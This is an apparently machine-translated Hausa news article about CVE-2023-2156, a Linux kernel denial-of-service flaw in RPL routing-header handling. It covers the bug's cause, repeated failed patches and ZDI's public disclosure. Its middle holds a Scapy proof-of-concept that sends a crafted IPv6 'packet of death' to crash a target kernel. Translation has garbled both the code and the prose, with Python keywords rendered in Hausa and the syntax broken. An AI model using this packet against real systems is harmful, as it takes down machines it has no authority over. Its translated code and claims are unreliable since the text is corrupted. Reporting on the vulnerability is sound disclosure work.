An bayyana bayani game da rashin lafiyar (0-day) mara kyau (CVE-2023-2156) a cikin Linux kernel, wanda ke ba da damar dakatar da tsarin ta hanyar aika fakitin IPv6 na musamman (fakitin mutuwa). Matsalar tana bayyana ne kawai lokacin da aka kunna ka'idar RPL (Routing Protocol for Low-Power and Lossy Networks), wanda aka kashe ta tsohuwa a cikin rarrabawa kuma ana amfani da shi musamman akan na'urorin da aka saka waɗanda ke aiki a cikin cibiyoyin sadarwa mara waya tare da babban asarar fakiti.
Rashin lahani yana faruwa ne ta hanyar sarrafa bayanan waje ba daidai ba a cikin lambar tantance ka'idar RPL, wanda ke haifar da gazawar tabbatarwa da kernel shiga cikin yanayin firgita. Lokacin sanya bayanan da aka samo daga fakitin fakitin IPv6 RPL a cikin tsarin k_buff (Socket Buffer), idan an saita filin CmprI zuwa 15, filin Segleft zuwa 1, da CmprE zuwa 0, 48-byte vector tare da adireshi yana raguwa. zuwa 528 bytes kuma yana bayyana yanayi inda ƙwaƙwalwar ajiyar da aka keɓe don buffer bai isa ba. A wannan yanayin, aikin skb_push, wanda ake amfani da shi don tura bayanai a cikin tsarin, bincika rashin daidaituwa tsakanin girman bayanan da buffer, haifar da yanayin tsoro don hana rubutu fiye da iyakar buffer.
Misalin amfani: # Za mu yi amfani da Scapy don kera fakiti daga scapy.duk shigo da soket * shigo da soket # Yi amfani da IPv6 daga LAN interface ɗinku DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Muna amfani da kwasfa don aika fakitin sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW,socket.IPPROTO_RAW) # Craft the packet # Type = 3 yana yin wannan fakitin RPL # Adireshi yana dauke da adireshi 3, amma saboda CmprI shine 15, # kowane octet na adiresoshin biyu na farko shine ana bi da shi azaman adireshin da aka matsa # Segleft = 1 don kunna haɓakawa # lastentry = 0xf0 saita CmprI zuwa 15 da CmprE zuwa 0 p = IPv6 (src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting (nau'in = 3, adiresoshin = [“a8) :", "a7::", "a6::"], segleft=1, lastentry=0xf0) # Aika wannan mugun fakiti sockfd.sendto(bytes(p), (DST_ADDR, 0))
Abin lura ne cewa an sanar da masu haɓaka kernel game da raunin a cikin Janairu 2022 kuma a cikin watanni 15 da suka gabata sun yi ƙoƙarin gyara matsalar sau uku, suna fitar da faci a cikin Satumba 2022, Oktoba 2022 da Afrilu 2023, amma duk lokacin da aka gyara. bai isa ba kuma ba za a iya sake haifar da rauni ba. Daga ƙarshe, aikin ZDI, wanda ya haɗa aikin don gyara raunin da ya faru, ya yanke shawarar fitar da cikakkun bayanai game da rashin lafiyar ba tare da jiran gyaran aiki ba a cikin kwaya.
Don haka, raunin har yanzu ya kasance ba a gyara ba. Musamman ma, facin da aka haɗa a cikin kernel 6.4-rc2 ba shi da tasiri. An shawarci masu amfani su duba cewa ba a amfani da ka'idar RPL akan tsarin su, wanda za'a iya yin amfani da umarnin sysctl -a | grep -i rpl_seg_enabled
source: budenet.ru